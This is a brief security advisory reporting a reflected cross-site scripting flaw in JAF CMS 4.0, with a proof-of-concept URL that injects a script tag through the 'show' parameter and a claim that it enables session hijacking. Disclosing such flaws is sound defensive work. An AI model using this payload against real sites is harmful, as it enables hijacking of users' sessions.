JAF CMS - 4.0 Cross Site Scripting Vulnerability

Source: http://sourceforge.net/projects/jaf-cms/

Author: Arham Muhammad

POC: http://site/path/index.php?show="><script>alert(/xss/);</script>

There Is No Sign Of Filteration In Jaf-Cms, Making It Prune To Xss
And Session Hijacking!